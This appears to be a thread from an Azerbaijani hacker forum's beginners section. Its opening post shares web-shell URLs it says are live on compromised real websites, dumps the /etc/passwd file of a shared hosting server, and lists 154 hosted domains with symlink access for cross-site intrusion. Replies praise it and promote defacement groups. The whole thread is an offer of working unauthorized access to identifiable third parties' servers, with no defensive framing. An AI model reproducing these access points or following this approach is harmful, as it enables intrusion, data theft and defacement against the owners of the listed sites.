Anti-armenia.ORG - Forumlar - Yeni başlayanlar üçün / 154 siteIstifadəçi
    2018-07-08 23:40 GMT                 

rustemliresidVIP
Mesaj Sayı : 114
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   16  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : DTX
Ölkə :
Məslək : Polis
Yaş : 29
Mesaj :

Mövzunu Paylaş!


Salam AAT əhli yeni başlayanlar üçündü ....
SHELL LİNKLƏRİ
LİNKLƏR HAZIRDA AKTİV İŞLƏKDİ
http://theimagestar.com/c100.php?act=ls&d=%2Fhome%2Ftheimagestar%2F&sort=0a
http://coabse.org/test.php?y=/home/coabse/public_html/
http://coabse.org/test.php?y=/home/coabse/public_html/&x=sec
SHELL LİNKLƏRİN DƏYİŞMƏYİN MÜMKÜNSƏ YENİLƏR FAYDALANA BİLSİN...


CONFİG MƏLUMATLARI
Kod:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:997:995:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
mailman:x:996:993:GNU Mailing List Manager:/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanelroundcube:x:201:201::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mysql:x:995:992:MySQL server:/var/lib/mysql:/bin/bash
cpanelphpmyadmin:x:994:991:phpMyAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanel:x:202:202::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelcabcache:x:203:203::/var/cpanel/userhomes/cpanelcabcache:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:204:204::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelrrdtool:x:205:205::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell
cpanellogin:x:993:990::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:992:989::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:991:988::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
cpanelconnecttrack:x:990:987::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
cpses:x:989:986::/var/cpanel/cpses:/sbin/nologin
cpanelsolr:x:988:984:Solr Search Server for Dovecot:/home/cpanelsolr:/bin/false
dassinfotech:x:1000:1002::/home/dassinfotech:/usr/local/cpanel/bin/jailshell
panelectricals:x:1001:1003::/home/panelectricals:/usr/local/cpanel/bin/jailshell
insmedia:x:1002:1004::/home/insmedia:/usr/local/cpanel/bin/jailshell
panresources:x:1003:1005::/home/panresources:/usr/local/cpanel/bin/jailshell
jharkhandfoundat:x:1004:1006::/home/jharkhandfoundat:/usr/local/cpanel/bin/jailshell
capfinindia:x:1005:1007::/home/capfinindia:/usr/local/cpanel/bin/jailshell
adteaindia:x:1006:1008::/home/adteaindia:/usr/local/cpanel/bin/jailshell
srvm:x:1007:1009::/home/srvm:/usr/local/cpanel/bin/jailshell
dainikup:x:1008:1010::/home/dainikup:/usr/local/cpanel/bin/jailshell
vatconsultantsno:x:1009:1011::/home/vatconsultantsno:/usr/local/cpanel/bin/jailshell
sajagvarta:x:1010:1012::/home/sajagvarta:/usr/local/cpanel/bin/jailshell
voiceofbharat:x:1011:1013::/home/voiceofbharat:/usr/local/cpanel/bin/jailshell
ncrlife:x:1012:1014::/home/ncrlife:/usr/local/cpanel/bin/jailshell
rbrlines:x:1013:1015::/home/rbrlines:/usr/local/cpanel/bin/jailshell
news4rail:x:1014:1016::/home/news4rail:/usr/local/cpanel/bin/jailshell
haryanamail:x:1016:1018::/home/haryanamail:/usr/local/cpanel/bin/jailshell
pesnet:x:1017:1019::/home/pesnet:/usr/local/cpanel/bin/jailshell
innovienconsulti:x:1018:1020::/home/innovienconsulti:/usr/local/cpanel/bin/jailshell
mrgtravels:x:1019:1021::/home/mrgtravels:/usr/local/cpanel/bin/jailshell
vidyapeetham:x:1020:1022::/home/vidyapeetham:/usr/local/cpanel/bin/jailshell
mvnu:x:1021:1023::/home/mvnu:/usr/local/cpanel/bin/jailshell
upos:x:1022:1024::/home/upos:/usr/local/cpanel/bin/jailshell
sanskritii:x:1023:1025::/home/sanskritii:/usr/local/cpanel/bin/jailshell
ecreationsmultim:x:1024:1026::/home/ecreationsmultim:/usr/local/cpanel/bin/jailshell
gstconsultantexp:x:1025:1027::/home/gstconsultantexp:/usr/local/cpanel/bin/jailshell
elearningstudio:x:1026:1028::/home/elearningstudio:/usr/local/cpanel/bin/jailshell
mediafederationo:x:1027:1029::/home/mediafederationo:/usr/local/cpanel/bin/jailshell
eduzonebooks:x:1028:1030::/home/eduzonebooks:/usr/local/cpanel/bin/jailshell
horizonrelocatio:x:1029:1031::/home/horizonrelocatio:/usr/local/cpanel/bin/jailshell
cinevarta:x:1030:1032::/home/cinevarta:/usr/local/cpanel/bin/jailshell
twodaughtersclub:x:1031:1033::/home/twodaughtersclub:/usr/local/cpanel/bin/jailshell
niveshak:x:1033:1035::/home/niveshak:/usr/local/cpanel/bin/jailshell
indianmediaclub:x:1034:1036::/home/indianmediaclub:/usr/local/cpanel/bin/jailshell
dkhs:x:1035:1037::/home/dkhs:/usr/local/cpanel/bin/jailshell
angelbioscope:x:1036:1038::/home/angelbioscope:/usr/local/cpanel/bin/jailshell
healthvarta:x:1037:1039::/home/healthvarta:/usr/local/cpanel/bin/jailshell
bhagyavarta:x:1038:1040::/home/bhagyavarta:/usr/local/cpanel/bin/jailshell
indiaonenetwork:x:1039:1041::/home/indiaonenetwork:/usr/local/cpanel/bin/jailshell
digishiksha:x:1040:1042::/home/digishiksha:/usr/local/cpanel/bin/jailshell
ibnews:x:1041:1043::/home/ibnews:/usr/local/cpanel/bin/jailshell
jurispritus:x:1042:1044::/home/jurispritus:/usr/local/cpanel/bin/jailshell
timesbusinessrep:x:1043:1045::/home/timesbusinessrep:/usr/local/cpanel/bin/jailshell
flowersandballoo:x:1044:1046::/home/flowersandballoo:/usr/local/cpanel/bin/jailshell
learningfloor:x:1045:1047::/home/learningfloor:/usr/local/cpanel/bin/jailshell
idhcsociety:x:1047:1049::/home/idhcsociety:/usr/local/cpanel/bin/jailshell
intellicapublica:x:1048:1050::/home/intellicapublica:/usr/local/cpanel/bin/jailshell
aceeximsolutions:x:1049:1051::/home/aceeximsolutions:/usr/local/cpanel/bin/jailshell
balvikas:x:1050:1052::/home/balvikas:/usr/local/cpanel/bin/jailshell
journalistassoci:x:1051:1053::/home/journalistassoci:/usr/local/cpanel/bin/jailshell
dmce:x:1052:1054::/home/dmce:/usr/local/cpanel/bin/jailshell
metpublicschool:x:1053:1055::/home/metpublicschool:/usr/local/cpanel/bin/jailshell
schoolvarta:x:1054:1056::/home/schoolvarta:/usr/local/cpanel/bin/jailshell
modernengineerin:x:1055:1057::/home/modernengineerin:/usr/local/cpanel/bin/jailshell
rajupublicity:x:1056:1058::/home/rajupublicity:/usr/local/cpanel/bin/jailshell
rnnkhabar:x:1057:1059::/home/rnnkhabar:/usr/local/cpanel/bin/jailshell
mfijc:x:1058:1060::/home/mfijc:/usr/local/cpanel/bin/jailshell
bhsed:x:1059:1061::/home/bhsed:/usr/local/cpanel/bin/jailshell
cbsedelhico:x:1060:1062::/home/cbsedelhico:/usr/local/cpanel/bin/jailshell
coabse:x:1061:1063::/home/coabse:/usr/local/cpanel/bin/jailshell
friendsphotocopy:x:1062:1064::/home/friendsphotocopy:/usr/local/cpanel/bin/jailshell
raillife:x:1064:1066::/home/raillife:/usr/local/cpanel/bin/jailshell
theimagestar:x:1065:1067::/home/theimagestar:/usr/local/cpanel/bin/jailshell
indiaprime:x:1066:1068::/home/indiaprime:/usr/local/cpanel/bin/jailshell
powerengineering:x:1067:1069::/home/powerengineering:/usr/local/cpanel/bin/jailshell
newsgroundtv:x:1068:1070::/home/newsgroundtv:/usr/local/cpanel/bin/jailshell
clamav:x:1069:1071::/home/clamav:/sbin/nologin
munin:x:987:983::/home/munin:/sbin/nologin
berojgarsena:x:1070:1072::/home/berojgarsena:/usr/local/cpanel/bin/noshell
risingball:x:1071:1073::/home/risingball:/usr/local/cpanel/bin/noshell
vkbpl:x:1073:1075::/home/vkbpl:/usr/local/cpanel/bin/noshell
cpanelanalytics:x:986:982::/var/cpanel/userhomes/cpanelanalytics:/usr/local/cpanel/bin/noshell
corbetttigerlane:x:1074:1076::/home/corbetttigerlane:/usr/local/cpanel/bin/noshell
mahajanaudiovisu:x:1075:1077::/home/mahajanaudiovisu:/usr/local/cpanel/bin/noshell
gyaneshnews:x:1076:1078::/home/gyaneshnews:/usr/local/cpanel/bin/noshell
rbrlambah:x:1077:1079::/home/rbrlambah:/usr/local/cpanel/bin/noshell
samacharvarta:x:1078:1080::/home/samacharvarta:/usr/local/cpanel/bin/noshell
tanyaimpex:x:1079:1081::/home/tanyaimpex:/usr/local/cpanel/bin/noshell
gyanesh2:x:1080:1082::/home/gyanesh2:/usr/local/cpanel/bin/noshell


SERVERDEKİ SAYTLAR
Kod:
1 ns5.dassinfotech.com root Symlink info
2 ns6.dassinfotech.com root Symlink info
3 dassinfotech.com dassinfotech Symlink info
4 panelectricals.com panelectricals Symlink info
5 insmedia.org insmedia Symlink info
6 panresources.in panresources Symlink info
7 jharkhandfoundation.com jharkhandfoundat Symlink info
8 capfinindia.com capfinindia Symlink info
9 adteaindia.com adteaindia Symlink info
10 srvm.in srvm Symlink info
11 dainikup.com dainikup Symlink info
12 vatconsultantsnoida.com vatconsultantsno Symlink info
13 sajagvarta.com sajagvarta Symlink info
14 voiceofbharat.in voiceofbharat Symlink info
15 ncrlife.in ncrlife Symlink info
16 rbrlines.com rbrlines Symlink info
17 news4rail.com news4rail Symlink info
18 haryanamail.in haryanamail Symlink info
19 pes.net.in pesnet Symlink info
20 innovienconsulting.in innovienconsulti Symlink info
21 mrgtravels.com mrgtravels Symlink info
22 vidyapeetham.com vidyapeetham Symlink info
23 mvnu.in mvnu Symlink info
24 upos.in upos Symlink info
25 sanskritii.in sanskritii Symlink info
26 ecreationsmultimedia.com ecreationsmultim Symlink info
27 gstconsultantexpert.com gstconsultantexp Symlink info
28 elearningstudio.in elearningstudio Symlink info
29 mediafederationofindia.com mediafederationo Symlink info
30 eduzonebooks.com eduzonebooks Symlink info
31 horizonrelocation.co.in horizonrelocatio Symlink info
32 cinevarta.com cinevarta Symlink info
33 twodaughtersclub.org twodaughtersclub Symlink info
34 niveshak.com niveshak Symlink info
35 indianmediaclub.com indianmediaclub Symlink info
36 dkhs.org dkhs Symlink info
37 angelbioscope.com angelbioscope Symlink info
38 healthvarta.com healthvarta Symlink info
39 bhagyavarta.com bhagyavarta Symlink info
40 indiaonenetwork.com indiaonenetwork Symlink info
41 digishiksha.com digishiksha Symlink info
42 ibnews.in ibnews Symlink info
43 jurispritus.com jurispritus Symlink info
44 timesbusinessreport.in timesbusinessrep Symlink info
45 flowersandballoonsdecorators.com flowersandballoo Symlink info
46 learningfloor.com learningfloor Symlink info
47 idhcsociety.org idhcsociety Symlink info
48 intellicapublications.com intellicapublica Symlink info
49 aceeximsolutions.com aceeximsolutions Symlink info
50 balvikas.in balvikas Symlink info
51 journalistassociation.com journalistassoci Symlink info
52 dmce.in dmce Symlink info
53 metpublicschool.net metpublicschool Symlink info
54 schoolvarta.com schoolvarta Symlink info
55 modernengineeringworks.com modernengineerin Symlink info
56 rajupublicity.com rajupublicity Symlink info
57 rnnkhabar.com rnnkhabar Symlink info
58 mfijc.com mfijc Symlink info
59 bhsed.in bhsed Symlink info
60 cbsedelhi.co.in cbsedelhico Symlink info
61 coabse.org coabse Symlink info
62 friendsphotocopy.com friendsphotocopy Symlink info
63 raillife.in raillife Symlink info
64 theimagestar.com theimagestar Symlink info
65 indiaprime.in indiaprime Symlink info
66 powerengineering.co.in powerengineering Symlink info
67 newsgroundtv.com newsgroundtv Symlink info
68 berojgarsena.com berojgarsena Symlink info
69 risingball.in risingball Symlink info
70 vkbpl.in vkbpl Symlink info
71 corbetttigerlane.com corbetttigerlane Symlink info
72 mahajanaudiovisual.com mahajanaudiovisu Symlink info
73 jharkhandlife.com gyaneshnews Symlink info
74 rbrlambah.com rbrlambah Symlink info
75 samacharvarta.com samacharvarta Symlink info
76 tanyaimpex.com tanyaimpex Symlink info
77 jharkhandlife.in gyanesh2 Symlink info
78 ns5.dassinfotech.com root Symlink info
79 ns6.dassinfotech.com root Symlink info
80 dassinfotech.com dassinfotech Symlink info
81 panelectricals.com panelectricals Symlink info
82 insmedia.org insmedia Symlink info
83 panresources.in panresources Symlink info
84 jharkhandfoundation.com jharkhandfoundat Symlink info
85 capfinindia.com capfinindia Symlink info
86 adteaindia.com adteaindia Symlink info
87 srvm.in srvm Symlink info
88 dainikup.com dainikup Symlink info
89 vatconsultantsnoida.com vatconsultantsno Symlink info
90 sajagvarta.com sajagvarta Symlink info
91 voiceofbharat.in voiceofbharat Symlink info
92 ncrlife.in ncrlife Symlink info
93 rbrlines.com rbrlines Symlink info
94 news4rail.com news4rail Symlink info
95 haryanamail.in haryanamail Symlink info
96 pes.net.in pesnet Symlink info
97 innovienconsulting.in innovienconsulti Symlink info
98 mrgtravels.com mrgtravels Symlink info
99 vidyapeetham.com vidyapeetham Symlink info
100 mvnu.in mvnu Symlink info
101 upos.in upos Symlink info
102 sanskritii.in sanskritii Symlink info
103 ecreationsmultimedia.com ecreationsmultim Symlink info
104 gstconsultantexpert.com gstconsultantexp Symlink info
105 elearningstudio.in elearningstudio Symlink info
106 mediafederationofindia.com mediafederationo Symlink info
107 eduzonebooks.com eduzonebooks Symlink info
108 horizonrelocation.co.in horizonrelocatio Symlink info
109 cinevarta.com cinevarta Symlink info
110 twodaughtersclub.org twodaughtersclub Symlink info
111 niveshak.com niveshak Symlink info
112 indianmediaclub.com indianmediaclub Symlink info
113 dkhs.org dkhs Symlink info
114 angelbioscope.com angelbioscope Symlink info
115 healthvarta.com healthvarta Symlink info
116 bhagyavarta.com bhagyavarta Symlink info
117 indiaonenetwork.com indiaonenetwork Symlink info
118 digishiksha.com digishiksha Symlink info
119 ibnews.in ibnews Symlink info
120 jurispritus.com jurispritus Symlink info
121 timesbusinessreport.in timesbusinessrep Symlink info
122 flowersandballoonsdecorators.com flowersandballoo Symlink info
123 learningfloor.com learningfloor Symlink info
124 idhcsociety.org idhcsociety Symlink info
125 intellicapublications.com intellicapublica Symlink info
126 aceeximsolutions.com aceeximsolutions Symlink info
127 balvikas.in balvikas Symlink info
128 journalistassociation.com journalistassoci Symlink info
129 dmce.in dmce Symlink info
130 metpublicschool.net metpublicschool Symlink info
131 schoolvarta.com schoolvarta Symlink info
132 modernengineeringworks.com modernengineerin Symlink info
133 rajupublicity.com rajupublicity Symlink info
134 rnnkhabar.com rnnkhabar Symlink info
135 mfijc.com mfijc Symlink info
136 bhsed.in bhsed Symlink info
137 cbsedelhi.co.in cbsedelhico Symlink info
138 coabse.org coabse Symlink info
139 friendsphotocopy.com friendsphotocopy Symlink info
140 raillife.in raillife Symlink info
141 theimagestar.com theimagestar Symlink info
142 indiaprime.in indiaprime Symlink info
143 powerengineering.co.in powerengineering Symlink info
144 newsgroundtv.com newsgroundtv Symlink info
145 berojgarsena.com berojgarsena Symlink info
146 risingball.in risingball Symlink info
147 vkbpl.in vkbpl Symlink info
148 corbetttigerlane.com corbetttigerlane Symlink info
149 mahajanaudiovisual.com mahajanaudiovisu Symlink info
150 jharkhandlife.com gyaneshnews Symlink info
151 rbrlambah.com rbrlambah Symlink info
152 samacharvarta.com samacharvarta Symlink info
153 tanyaimpex.com tanyaimpex Symlink info
154 jharkhandlife.in gyanesh2 Symlink info


http://i.hizliresim.com/lZEdjB.png

http://i.hizliresim.com/Q2QaBv.png

http://i.hizliresim.com/0zy1nR.png

https://i.hizliresim.com/Rnor8R.gif
Anti-armenia.ORG
    

Istifadəçi
    2018-07-08 23:59 GMT                 

tsgmrfoxİstifadəçi
Mesaj Sayı : 18
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : tsgmrfox
Yaş :
Mesaj :

Mövzunu Paylaş!


Əla Bro ! Əlinə Sağlıq
+1 rep

ORDA BİR YOL VAR UZAQDA
O YOL BİZİM YOLUMUZDU
DÖNMƏSƏK DƏ VARMASAQ DA
O YOL BİZİM YOLUMUZDUR

https://i.hizliresim.com/NOMZOk.png
Anti-armenia.ORG
    

Istifadəçi
    2018-07-15 23:03 GMT                 

Mehemmed01İstifadəçi
Mesaj Sayı : 10
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Astara,Kijəbə
Ölkə :
Məslək : Xakerlik
Yaş : 19
Mesaj :

Mövzunu Paylaş!


ƏJDAHA HALALDI !

https://b.radikal.ru/b39/1807/a8/16c5f14be66f.png
Anti-armenia.ORG
    

Istifadəçi
    2019-01-18 12:34 GMT                 

AZE_Tayfunİstifadəçi
Mesaj Sayı : 11
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Tbilisi
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


qaqa skype yazda olarsa menem tapo

Bildikləri İlə Yekəxanalıq Eləməyən Öz Aləmində Tək Fırlanan Qoca Xaker/Programmer
Hərşeyə Dünyanın sirrlərinə dair nələr bildiyimi inan bilə bilməzsən ama Sadəcə hamımız boğazımızdakı zənciri hissetməyən yaşayan zombilərik
Anti-armenia.ORG
    

Istifadəçi
    2020-02-03 21:20 GMT                 

HaCkEr_33VIP
Mesaj Sayı : 373
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   21  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumgait
Ölkə :
Məslək : Defacer
Yaş : 9
Mesaj :

Mövzunu Paylaş!


Yeni başlayan hardan bilsin config nədi shell nədi

Əlivə sağliq

{ NO SYSTEM IS SAFE }


We Are BlackHatz From Azerbaijan Hacker!
https://mirror-h.org/search/hacker/32003/
https://1nj3ctor.com/attacker/883/
Anti-armenia.ORG
    

Istifadəçi
    2020-02-04 09:43 GMT                 

rustemliresidVIP
Mesaj Sayı : 114
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   16  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : DTX
Ölkə :
Məslək : Polis
Yaş : 29
Mesaj :

Mövzunu Paylaş!


Sitat
#60947 HaCkEr_33 :
Yeni başlayan hardan bilsin config nədi shell nədi

Əlivə sağliq


bizdə yeni başlayanda kodları qurcaliya qurcalıya öyrənmişik
Uğurlar

https://i.hizliresim.com/Rnor8R.gif
Anti-armenia.ORG
    

Istifadəçi
    2020-02-04 11:41 GMT                 

HaCkEr_33VIP
Mesaj Sayı : 373
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   21  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumgait
Ölkə :
Məslək : Defacer
Yaş : 9
Mesaj :

Mövzunu Paylaş!


Sitat
#60950 rustemliresid :
Sitat
#60947 HaCkEr_33 :
Yeni başlayan hardan bilsin config nədi shell nədi

Əlivə sağliq


bizdə yeni başlayanda kodları qurcaliya qurcalıya öyrənmişik
Uğurlar


Lap yaxşi kaşki yeni başlayan gənc nəsildə belə etsin !

{ NO SYSTEM IS SAFE }


We Are BlackHatz From Azerbaijan Hacker!
https://mirror-h.org/search/hacker/32003/
https://1nj3ctor.com/attacker/883/
Anti-armenia.ORG
    

Istifadəçi
    2020-02-04 14:12 GMT                 

rustemliresidVIP
Mesaj Sayı : 114
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   16  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : DTX
Ölkə :
Məslək : Polis
Yaş : 29
Mesaj :

Mövzunu Paylaş!


Sitat
#60953 HaCkEr_33 :
Sitat
#60950 rustemliresid :
Sitat
#60947 HaCkEr_33 :
Yeni başlayan hardan bilsin config nədi shell nədi

Əlivə sağliq


bizdə yeni başlayanda kodları qurcaliya qurcalıya öyrənmişik
Uğurlar


Lap yaxşi kaşki yeni başlayan gənc nəsildə belə etsin !

indiki nəsilin başı tiktokdan instagramnan açılsa edər nə var köhnələrdə var

https://i.hizliresim.com/Rnor8R.gif
Anti-armenia.ORG
    

Istifadəçi
    2020-02-04 17:22 GMT                 

HaCkEr_33VIP
Mesaj Sayı : 373
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   21  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumgait
Ölkə :
Məslək : Defacer
Yaş : 9
Mesaj :

Mövzunu Paylaş!


Sitat
#60955 rustemliresid :
Sitat
#60953 HaCkEr_33 :
Sitat
#60950 rustemliresid :
Sitat
#60947 HaCkEr_33 :
Yeni başlayan hardan bilsin config nədi shell nədi

Əlivə sağliq


bizdə yeni başlayanda kodları qurcaliya qurcalıya öyrənmişik
Uğurlar


Lap yaxşi kaşki yeni başlayan gənc nəsildə belə etsin !

indiki nəsilin başı tiktokdan instagramnan açılsa edər nə var köhnələrdə var


Tam Razi elə dovrdə yaşayiriq ki cəmiyyət sadəcəm instagram facebook wifi qirana xaker deyir)
Respect

{ NO SYSTEM IS SAFE }


We Are BlackHatz From Azerbaijan Hacker!
https://mirror-h.org/search/hacker/32003/
https://1nj3ctor.com/attacker/883/
Anti-armenia.ORG